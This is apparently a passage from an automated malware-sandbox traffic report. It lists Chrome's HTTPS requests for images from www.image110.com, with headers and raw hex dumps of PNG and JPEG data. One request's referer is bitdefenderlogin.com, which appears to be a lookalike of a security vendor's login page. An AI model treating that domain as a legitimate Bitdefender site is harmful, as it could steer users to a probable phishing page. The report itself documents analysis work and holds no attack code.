                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 15 7d 7d 44 07 1e 30 d7 0e 3c c1 02 60 90 b1 40 5a f0 0f 52 73 e4 19 02 41 f5 40 2a c0 81 2e 0c c4 0b b2 10 88 a8 81 12 64 06 12 35 76 62 ac 75 e8 ca ec 42 8b 45 84 9d 10 ce 58 37 99 2a 91 2a 2b f9 ca 3a 44 e3 a0 3d db e5 ff 8e 4d b6 d8 02 e5 44 ca 40 a9 b0 90 e1 20 91 ae 0b 08 90 30 8a 7d 78 fb db e0 de 87 09 52 81 84 d8 68 60 01 26 08 b7 ba 47 d1 88 37 97 06 04 a1 d8 1c c6 12 c6 67 e3 d5 56 ca a0 a5 99 06 2d 96 61 41 b2 34 21 d4 e6 c7 b5 33 92 ed c3 5c bb db ea 06 b7 09 1a 51 6e d3 9c 3b dd 09 ff f6 28 90 e0 ee d9 c4 fb 21 b2 a8 80 05 5a e1 80 47 f8 a0 07 6b 70 40 07 3a e0 03 11 00 53 16 aa ff fe 89 08 4e 70 88 58 7b e1 c7 c4 38 c7 29 9e e1 ea 9f e8 da d7 b7 36 f6 40 29 77 ad 5d 6f f8 93 bf 56 a7 42 a0 3c b1 6d 18 fd e8 48 ff 64 db 92 7e f4 85 e8 7c cb
                                                                                                                                                          Data Ascii: }}D0<`@ZRsA@*.d5vbuBEX7**+:D=MD@ 0}xRh`&G7gV-aA4!3\Qn;(!ZGkp@:SNpX{8)6@)w]oVB<mHd~|
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: c7 ba 89 11 74 7e 53 a5 2b 75 23 39 31 68 34 60 65 ab 91 21 81 96 1e 12 f1 39 71 f2 c4 49 07 5a d9 c8 ee 69 c0 86 e4 eb 72 b7 3a 22 f4 7a 94 15 70 a6 93 7f 03 7d ea fe 96 48 90 98 46 46 1d ef ec 08 2d 1e ea 4c ae e0 d5 04 78 bd a8 5d e8 82 d3 6d d1 22 21 43 fb c4 2b fd 09 cc 86 18 cb a4 0a 49 e8 b0 72 69 a4 5a 39 c7 ff 97 1e 69 ec 01 95 9a 99 99 d6 b5 2f 1f d9 29 f6 70 0a 51 7e 84 12 b4 a1 d4 22 47 b9 52 ca be 08 b6 a8 ab 45 55 c8 8e 08 d0 59 c9 cf 8d 0f c1 15 06 6f a1 0e 93 48 40 41 53 05 49 65 3f 81 92 ac 12 eb a3 24 99 99 57 bd 09 56 43 d5 76 24 84 14 60 af 7a d8 8f 83 12 b0 67 53 65 ab fd 06 92 3c a9 dc 72 32 3d a1 03 43 3f 22 87 bb 4e 94 2b e3 13 6f 5e cb db d7 b7 fc f5 a7 6b 93 43 ea be f4 ca ca ba c0 5f ab 84 a7 3a 69 86 52 b7 36 55 b6 13 f1 d8 40
                                                                                                                                                          Data Ascii: t~S+u#91h4`e!9qIZir:"zp}HFF-Lx]m"!C+IriZ9i/)pQ~"GREUYoH@ASIe?$WVCv$`zgSe<r2=C?"N+o^kC_:iR6U@
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: fc 42 ff 09 25 41 df 80 04 16 38 db 7a f8 25 f8 95 31 fb 19 e8 20 48 08 2a 28 e1 3e 0c 72 b4 80 28 e4 89 92 d0 85 1c 62 78 c7 40 e3 3d 28 e2 88 24 d2 45 cb 7d 13 be 47 4b 89 2c 5e 74 62 8a 13 c2 c7 91 28 7c 1c b1 a1 86 08 89 12 86 8d 2d f6 e8 e3 8f 22 6d 07 23 8c d6 01 69 e4 41 42 0e 39 61 91 1a 59 60 c1 2e 04 e0 18 a5 0d 3d 44 29 8a 0d 06 5d 49 c0 25 aa 1c e9 e5 97 60 22 b4 c1 1c 4a 96 39 c7 06 61 fa 38 66 99 4a 9e 89 11 26 57 1e d1 03 96 3d 58 20 10 27 ff 60 f9 cf 25 04 d9 e0 67 9a 80 06 0a a4 1c 28 b2 a9 20 14 af 09 fa 20 a1 86 2a 89 28 46 9d d8 10 06 28 7e ee d8 c7 3f 04 e4 f9 8f 05 1f 3e 91 e7 9f e7 1d d0 cf a8 a4 f6 73 c0 45 b7 b8 90 c2 45 0a 4c e1 ea ab ae 2a ff 80 de 2d b0 29 70 c0 ad b8 1e e0 02 41 b6 e6 7a ab ac 7a d1 ba 90 39 c8 ec 7a d0 14 c2
                                                                                                                                                          Data Ascii: B%A8z%1 H*(>r(bx@=($E}GK,^tb(|-"m#iAB9aY`.=D)]I%`"J9a8fJ&W=X '`%g( *(F(~?>sEEL*-)pAzz9z
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 8e 41 8b ea 89 87 89 88 71 f4 08 f1 b7 12 e1 0e ff 60 09 55 81 00 6e fb 11 29 63 5f cb 9d 95 fc 7d 3f 8b bb f7 c0 02 ce 38 4f d9 69 3c b8 6e 8c e1 46 e9 65 34 c3 4c 9f 13 c7 f3 f6 87 7d 9e 7f e0 1e e8 1f 2e dd e6 16 d1 b2 4b f6 e2 27 89 a3 20 e9 95 c1 db 37 e4 64 34 ee ec fc 3e b1 c8 b8 e7 9c ee 4f 5a 2f f0 6a 8e da 05 31 dd d4 0d f6 75 3a 16 8b 3e a0 e2 ad 86 8e d8 0d 73 c8 f9 09 e1 e5 9a 81 00 09 a0 fb 3c 21 e3 cd 08 c6 59 41 f2 3b 9d e9 33 af 8f d5 5e e7 12 ce 46 ce 07 bc 8e 4c f3 8e 6f f3 e1 2e e8 5e ad 10 64 67 19 3d 0f a0 6d 5d 80 99 ff 7f 1a ea ee a4 73 78 18 63 20 8c a1 fe d8 2f 9a e1 ad ea 5e dc 8e fe d5 74 fa b6 96 fa 2c 75 fd 41 ee f0 8d 80 ea 41 6b e8 8e d7 0d 9a cf 0f d6 0d 10 fb 04 0e 24 58 90 a0 89 7f fc 14 2e 64 c8 70 cc 3f 88 11 25 46 7c
                                                                                                                                                          Data Ascii: Aq`Un)c_}?8Oi<nFe4L}.K' 7d4>OZ/j1u:>s<!YA;3^FLo.^dg=m]sxc /^t,uAAk$X.dp?%F|
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 64 08 c8 02 94 ca 80 01 90 07 09 1b 23 48 b1 00 27 48 65 50 98 04 50 00 9b 35 a0 00 2b 60 85 10 50 83 11 40 85 77 88 85 77 28 86 62 c0 eb 77 e8 05 22 68 87 a9 d0 81 c2 de 01 39 72 3f c2 41 66 3a 42 66 06 38 39 c7 6e 03 18 d0 5f 6c 14 39 42 a0 00 50 e8 81 5d c8 85 ff d4 cc 39 19 48 1c 76 b0 06 6b a8 06 5c 68 00 19 58 87 28 fb 04 26 10 08 ca b1 60 05 f8 84 3d d0 85 09 d0 05 40 40 54 40 9c ed 36 ab 6d 64 ba 1f 87 a0 97 97 ee 2b 53 92 0c e1 d6 8c 1b 18 6e e2 5e 8f f5 ac 0c b7 6d e9 4f a8 6f c3 f0 6f e7 26 0e 25 66 08 e5 e8 e1 81 58 80 ea 96 e3 eb 46 17 24 be 9e 6e e0 69 17 d4 00 12 f1 19 09 ff 26 49 07 8d 0e 54 8c 14 98 f5 74 74 db 0f 7e 6f fd 7e 96 81 50 80 29 a0 03 80 de e2 95 66 e9 2c 2b 63 98 46 e3 b9 fb 3c 4e 67 62 23 71 e3 7f 20 83 d4 2d 08 f1 e4 33 ec
                                                                                                                                                          Data Ascii: d#H'HePP5+`P@ww(bw"h9r?Af:Bf89n_l9BP]9Hvk\hX(&`=@@T@6md+Sn^mOoo&%fXF$ni&ITtt~o~P)f,+cF<Ngb#q -3
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 00 05 30 03 52 12 56 de 61 21 c9 23 10 16 e4 01 a8 b1 46 6a 80 8f 7c e6 0e 66 f0 01 a8 71 1a 17 34 02 ab 00 0b 72 23 98 86 86 28 9e 00 99 19 66 10 bb c1 3c d5 b3 0e 12 20 01 95 37 59 2e b7 51 6d aa 6a ce b6 7b 26 65 a3 68 9a a6 06 01 84 38 7a a6 63 0a 52 1f 76 74 07 11 51 b9 08 11 0a 72 23 20 b0 00 82 2a a8 26 80 04 00 02 02 dd b0 af 4d da 08 ff a1 af 4c ba 00 75 52 0e 5f 9a ae 2c 49 a6 29 f9 0f 9a b9 6a 1f f9 0f ee 0a a6 9f 35 83 45 26 10 34 0a 6a 74 3a 10 f7 8a a5 01 2b b0 82 da 0d 51 1a 1d 64 40 a5 22 bb 0f ff 50 b0 03 4b 24 0a db 10 10 a0 9e ad b0 8c 3d 70 08 44 ff 60 01 4e 60 01 03 d0 01 86 70 0e 11 70 8d a7 a0 0d 36 21 06 e7 e0 00 03 a0 0d da 00 01 b2 70 0a 15 e0 05 a7 b0 7e 2b c1 a2 0b 11 49 4d 00 67 31 a0 09 66 25 12 65 60 a0 b8 7a ab b7 8a ab 60
                                                                                                                                                          Data Ascii: 0RVa!#Fj|fq4r#(f< 7Y.Qmj{&eh8zcRvtQr# *&MLuR_,I)j5E&4jt:+Qd@"PK$=pD`N`pp6!p~+IMg1f%e`z`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          38192.168.2.549759103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:37 UTC384OUTGET /uploads/a8b0a829b0971449e9e3a884cb637e9a.png HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:37 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:37 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 58572
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:25:06 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf92-e4cc"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:37 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:37 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 88 00 00 00 30 08 06 00 00 00 7a fa 41 c8 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 20 00 49 44 41 54 78 9c ec bd 77 9c 9d d5 7d e7 ff fe 9e a7 dc 36 77 7a 95 46 33 a3 19 f5 86 40 42 80 c0 20 d1 4c 75 62 c7 90 d8 8e 9d c4 49 cc a6 ec a6 ed c6 4e 76 37 32 d9 df 66 e3 d8 29 eb 38 c9 cf 6c b2 c4 71 62 27 22 b1 09 76 30 31 45 22 98 62 83 68 12 42 a0 5e 46 65 7a b9 ed 69 e7 bb 7f dc 91 90 a8 06 84 84 e3 fb 7e bd a4 b9 73 ef 73 cf 73 ce 99 e7 79 ce 39 9f f3 2d c2 bb 14 55 e4 fe bf cc b5 37 4d d6 77 87 29 3b db 40 9b 15 6d 50 8b 83 91 48 ad b5 22 46 cc f1 e3 45 1d b5 38
                                                                                                                                                          Data Ascii: PNGIHDR0zApHYsttfxtEXtSoftwareAdobe ImageReadyqe< IDATxw}6wzF3@B LubINv72f)8lqb'"v01E"bhB^Fezi~sssy9-U7Mw);@mPH"FE8
                                                                                                                                                          2024-06-09 22:40:37 UTC16384INData Raw: 95 71 11 3c f5 98 e1 1a d2 d6 e2 5b c3 0c a3 24 34 c7 88 44 4c c7 25 9b 4b 31 63 ed 3a a2 c8 27 df d8 c8 d0 57 df 4d 70 cd e7 69 74 23 a6 5b 21 92 88 8c 51 56 c6 7c 3c 63 b1 28 d3 01 4f 95 16 75 39 5b 0c 8e 15 52 4c f0 9c 99 64 f0 60 1a 67 c1 26 ce 2a 29 73 1d 87 d0 58 26 ac 83 a9 38 2c c0 65 7e 08 b5 a2 54 5a 0f 32 da 7c 88 54 24 24 b2 c7 28 0d cf 66 3b d5 2a d6 25 80 fa 24 8d 6a 98 1b 25 18 23 60 ec 9c bb a9 d9 75 21 5e c7 cf b1 b3 37 11 ee 12 52 91 43 d6 09 a9 89 25 a8 7b eb b7 49 7d e7 ad 14 5e 6a 9f 22 51 3d 5a d3 30 d0 53 8c 15 19 1f 6a e6 f3 3f 7e 3d 8e b1 7c f0 8a db 48 d5 8d 35 e0 78 2f aa 04 96 6e e8 6e 90 81 f4 72 94 16 85 13 e3 a1 0a 44 6a fa bc 20 b9 d9 75 2b c7 8e a7 8c 15 f3 b1 a4 6b a4 1e 6c fa d4 96 14 4b 34 e1 12 1b a9 5c d3 1b b1 05 da
                                                                                                                                                          Data Ascii: q<[$4DL%K1c:'WMpit#[!QV|<c(Ou9[RLd`g&*)sX&8,e~TZ2|T$$(f;*%$j%#`u!^7RC%{I}^j"Q=Z0Sj?~=|H5x/nnrDj u+klK4\
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 44 f4 01 ed 40 4a 42 81 0c 16 65 16 86 36 42 c2 e9 fe b7 03 75 38 86 30 3c 88 70 15 8e 8f ea a5 34 03 0d 54 19 e2 7a 7e ca 2d bc 2a 6e 40 71 d7 8e de 4a f7 be 6e 2d a3 62 42 31 c6 90 35 42 a9 92 b2 6b e4 b0 9e f7 d1 c9 6e aa 5a e5 db 0f 74 f2 83 fb 0e 50 0d 73 fc dd 1b 4e 3d 46 2d 19 1a a3 80 bf b9 7a 09 fd 13 55 be bb 61 2f 43 e2 68 69 2b 00 5a db 31 78 c5 4c 8d 33 95 99 c9 fe 19 27 31 15 06 d4 c7 29 82 47 33 59 8c 81 d1 9f fd 9c e1 4d f7 33 7b ed 55 b5 46 83 80 cc dc 85 a4 69 ca ee 4f ad 67 e8 fb b7 52 6c 36 04 ad 75 a8 0a b8 e3 d7 7f 82 60 8c c1 da 90 52 1a 97 06 cb 53 af 7a c9 cb f3 61 c6 bc 9f 1c 2a 0d bf eb a6 f1 9e 4e f5 d6 bc d7 98 70 09 02 a2 c1 6b 4b c3 07 07 27 fb 96 4e 15 67 ee dc 52 37 eb 89 81 43 3b 5a 6f b2 ce 2d 12 c3 5b bd f5 6f a8 af 72
                                                                                                                                                          Data Ascii: D@JBe6Bu80<p4Tz~-*n@qJn-bB15BknZtPsN=F-zUa/Chi+Z1xL3'1)G3YM3{UFiOgRl6u`RSza*NpkK'NgR7C;Zo-[or
                                                                                                                                                          2024-06-09 22:40:38 UTC9766INData Raw: 66 4f b6 0a 9a 2d 13 db a9 56 fe 36 c4 3c a1 e2 ac 57 c9 49 d3 70 18 8c f1 3e 90 08 1f 77 a8 37 bf 20 f0 4b c0 49 49 01 13 22 ae bb d5 94 0a 2f 47 da a5 20 7b c9 ad 10 1f 2d 6f ca 79 4f 24 ae 8f 29 ad 9a 29 1a 65 ca 86 32 96 2d 5a 6c 28 68 15 51 8f 8a 69 be c2 28 12 18 b4 0e b5 99 2a b5 86 87 ce 00 e6 e7 0d 82 50 47 d0 00 c2 80 54 3d 69 63 96 02 30 42 e2 eb c7 4f c6 79 cf 4c b5 01 d9 00 ac 05 d1 e7 b0 8d 87 59 bf fe 55 5b 67 9f 33 82 48 1a c1 a0 0f d2 7d 8a bd b4 9c 0f 2e 54 65 a7 08 4e 72 a5 83 51 d4 b7 2b e3 1b 57 8b a1 e9 19 af fe 6a af f2 81 fd 4f ad f9 cf 3e 71 4f 48 ea 77 82 cf 46 8e 96 63 fb 0b a7 8a 71 da 5b 6a 78 4d 1b 2d 8d 5c ad 75 b2 59 af 7d ef bd 6b 82 34 8d db 10 51 bc 6e b6 e2 77 1d 7e e2 86 35 9a e8 af 2a be bf 59 cf e8 71 55 3b 83 89 9f
                                                                                                                                                          Data Ascii: fO-V6<WIp>w7 KII"/G {-oyO$))e2-Zl(hQi(*PGT=ic0BOyLYU[g3H}.TeNrQ+WjO>qOHwFcq[jxM-\uY}k4Qnw~5*YqU;


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          39192.168.2.549762103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:37 UTC627OUTGET /uploads/f5056584ed4cee1f2c0b461e38ee3629.jpg HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:38 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:37 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 45789
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:26:00 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfc8-b2dd"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:37 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:38 UTC16037INData Raw: ff d8 ff e1 1a d0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 90 87 69 00 04 00 00 00 01 00 00 00 a4 00 00 00 d0 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 31 3a 31 38 20 32 30 3a 31 37 3a 32 31 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 4e a0 03 00 04 00 00 00 01 00 00 00 51 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 1e 01 1b 00 05 00 00 00 01 00
                                                                                                                                                          Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop CS6 (Windows)2022:11:18 20:17:21NQ
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 00 00 00 38 42 49 4d 52 6f 6c 6c 00 00 00 08 00 00 00 00 00 00 00 00 38 42 49 4d 0f a1 00 00 00 00 00 1c 6d 66 72 69 00 00 00 02 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 38 42 49 4d 04 06 00 00 00 00 00 07 00 07 00 00 00 01 01 00 ff e1 15 ac 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f
                                                                                                                                                          Data Ascii: 8BIMRoll8BIMmfri8BIMhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/
                                                                                                                                                          2024-06-09 22:40:38 UTC13368INData Raw: 1f 0d cb f9 e3 f1 09 87 a6 38 de 6a c7 f0 9a f8 7d 3a 7a 39 a7 c0 30 f8 aa 99 73 a6 67 2d 85 62 99 b7 cb ad 8a 78 64 a4 cb 54 33 4b 2f e9 a1 78 66 9c 98 94 89 a3 b0 41 f5 59 be 96 57 85 bd de 53 e8 43 4a 1d f5 cc 98 96 9b f1 21 99 04 10 a7 d6 00 c0 85 25 3e 23 e1 34 e6 40 da 9b 25 e0 31 18 27 cc f1 f4 a3 83 eb 4f d0 17 a7 be a8 67 01 e9 8f d4 ef ab 5c 3f a4 5d 74 e9 2b 43 94 fd 34 7a e9 eb ae 63 cb b8 c5 57 51 f0 79 28 a9 b1 1a 9c b1 d4 2a 6a 1c 43 e6 70 9c 53 0b aa ad 23 0c aa ac 78 de 6a 27 03 cb 91 a1 65 11 e7 65 9d a1 e6 b9 53 07 31 ca ec 0b b6 6f f8 9f b4 69 0b 4a 58 5c 94 87 6d 89 4e 95 a1 c4 a7 f6 a8 40 21 2e 02 64 05 03 4a f3 06 90 e9 08 71 5e 24 ec 51 da 47 42 ba c7 03 d1 55 61 d3 3f 45 d4 7e 88 aa bd 4a 67 ee ae fa e0 ac e8 27 ac cf 4f 13 1c a3
                                                                                                                                                          Data Ascii: 8j}:z90sg-bxdT3K/xfAYWSCJ!%>#4@%1'Og\?]t+C4zcWQy(*jCpS#xj'eeS1oiJX\mN@!.dJq^$QGBUa?E~Jg'O


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          40192.168.2.549763103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:37 UTC384OUTGET /uploads/e0c3a46eddb28a1d16d6d07cc16467fe.jpg HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:38 UTC347INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:37 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 51903
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:25:43 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfb7-cabf"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:37 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:38 UTC16037INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 02 02 02 02 02 02 02 02 02 02 03 03 03 03 03 03 03 03 03 03 01 01 01 01 01 01 01 02 01 01 02 02 02 01 02 02 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 03 ff c0 00 11 08 00 51 01 4e 03 01 11 00 02 11 01 03 11 01 ff c4 00 e7 00 00 01 05 01 00 03 01 01 00 00 00 00 00 00 00 00 08 00 06 07 09 0a 05 02 03 04 01 0b 01 00 00 06 02 03
                                                                                                                                                          Data Ascii: ExifII*DuckydAdobedQN
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 90 ab d5 7b e2 43 16 53 0f 6d 1c f0 0e ce 36 61 d1 98 54 58 a4 8b a3 b6 6a a8 a5 30 3f 30 21 d1 3a 6b 29 93 2d 83 9e 2d af 6b 17 1c b5 5f 3d da 95 d0 f5 80 cf 8d 13 fa 82 c3 99 51 ac 84 95 d4 8d 63 e5 ae a0 81 d6 a5 e4 6c ac 56 99 25 5a 1d 6a 1b 96 a1 6c 98 fb 7a 1e 40 f2 5e 47 41 f7 bf 5f 12 74 ae 1d 70 d7 94 b6 48 57 f9 7e 2b ad e0 68 de 45 3c 86 48 5b 72 79 4d 6a ab 8f a6 ba 13 d6 1a fc 4c 34 d0 58 2c 52 0d 5c 2e 48 a9 4f 8a 82 46 a8 b8 fe 70 21 54 fa c0 e5 11 23 16 46 1c 6a 23 cd 7e 4c 67 73 09 8b 55 b0 b0 49 38 0d db 76 e8 21 01 00 ba ab 69 d4 41 21 58 8d 7a 4e 86 1a 9c b6 83 34 75 85 a4 4b f6 89 42 ea 9f 16 d0 1d 4f d8 7e c0 78 8b b9 8a f3 51 c4 3a 1a a1 53 bb 50 17 cb 65 39 96 67 c9 26 d1 ac e2 51 cb 2b 7c 47 22 cb 6f 79 ee 53 63 a5 56 db 5b e3 9b
                                                                                                                                                          Data Ascii: {CSm6aTXj0?0!:k)--k_=QclV%Zjlz@^GA_tpHW~+hE<H[ryMjL4X,R\.HOFp!T#Fj#~LgsUI8v!iA!XzN4uKBO~xQ:SPe9g&Q+|G"oyScV[
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: db 29 36 b6 80 d2 4d 9e 8b a2 5f e1 ef f3 d1 0c 65 fe f3 7e 5c 3b 13 46 a2 08 a8 2d 0a 50 65 ee db d6 2f 19 78 97 c9 3e 5a 96 4a 9e 2b c1 65 37 1d 8a 11 56 b5 66 3a f5 d2 7d 16 67 63 03 d8 84 b2 23 47 2b 57 91 5e 12 86 bb af 54 72 c6 51 c2 98 f7 09 94 ce d1 dd 97 37 de 42 96 d8 86 f5 6b f3 54 85 6c 48 29 d6 ab 3d 70 3a bd 1c 70 34 40 c9 10 75 31 d8 62 f3 06 0b 32 bf 79 7b 83 f9 de 5c 50 ac b5 b6 d9 db 52 de bd 91 a8 37 9f 97 46 af 21 24 9f d5 20 f6 be 93 f5 c9 0e ed f2 7f 4b 6f ad db 86 05 4c ea 07 d6 9f b1 84 7f 94 3f a3 d7 b2 1f 0f de f2 26 4b c5 7b 77 21 e5 ca b0 52 f2 7c d8 6a 8f 95 af 0f 47 6e 1b cd 0a 1b 31 af 6e 49 a3 fa 65 ea 04 47 2c 91 83 a8 47 65 01 8d 78 dd 10 e0 eb ee 3b d0 ed a9 1a 5c 02 d9 90 57 73 d5 ab 44 18 f4 1f a9 55 88 d3 e0 59 55 88
                                                                                                                                                          Data Ascii: )6M_e~\;F-Pe/x>ZJ+e7Vf:}gc#G+W^TrQ7BkTlH)=p:p4@u1b2y{\PR7F!$ KoL?&K{w!R|jGn1nIeG,Gex;\WsDUYU
